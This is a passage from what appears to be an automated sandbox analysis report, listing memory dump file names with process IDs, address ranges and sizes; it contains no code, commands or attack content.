                                                                                                                                                    • memory/1180-198-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1416-177-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1448-185-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1468-148-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1472-179-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1496-145-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1732-186-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1744-141-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1816-150-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1876-190-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/1896-208-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2152-204-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2316-175-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2612-181-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2708-188-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2776-184-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2828-144-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/2900-222-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3008-183-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3076-138-0x0000000010000000-0x0000000011000000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16.0MB

                                                                                                                                                    • memory/3076-135-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3276-207-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3288-147-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3288-182-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3340-249-0x0000000002080000-0x0000000003080000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16.0MB

                                                                                                                                                    • memory/3436-132-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3452-200-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3508-196-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3540-209-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3584-201-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3636-142-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3656-143-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3664-197-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3704-187-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3748-214-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/3916-169-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4024-156-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4044-174-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4076-211-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4164-221-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4220-210-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4232-172-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4256-206-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4276-146-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4392-220-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4416-149-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4464-199-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4592-215-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4596-155-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4620-180-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4696-165-0x0000000004460000-0x0000000004482000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/4696-163-0x00000000019B0000-0x00000000019E6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      216KB

                                                                                                                                                    • memory/4696-162-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4696-168-0x0000000005300000-0x000000000531E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      120KB

                                                                                                                                                    • memory/4696-167-0x0000000004D00000-0x0000000004D66000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      408KB

                                                                                                                                                    • memory/4696-166-0x00000000045C0000-0x0000000004626000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      408KB

                                                                                                                                                    • memory/4696-164-0x0000000004660000-0x0000000004C88000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      6.2MB

                                                                                                                                                    • memory/4720-173-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4728-193-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4736-192-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4784-203-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4808-191-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/4940-246-0x0000000006AA0000-0x0000000006B56000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      728KB

                                                                                                                                                    • memory/4940-242-0x0000000005BE0000-0x0000000005C5C000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      496KB

                                                                                                                                                    • memory/4940-232-0x0000000005270000-0x00000000052D7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      412KB

                                                                                                                                                    • memory/4940-228-0x0000000004C20000-0x0000000004CA5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      532KB

                                                                                                                                                    • memory/5024-212-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5064-176-0x0000000000000000-mapping.dmp
                                                                                                                                                    • memory/5096-170-0x0000000000000000-mapping.dmp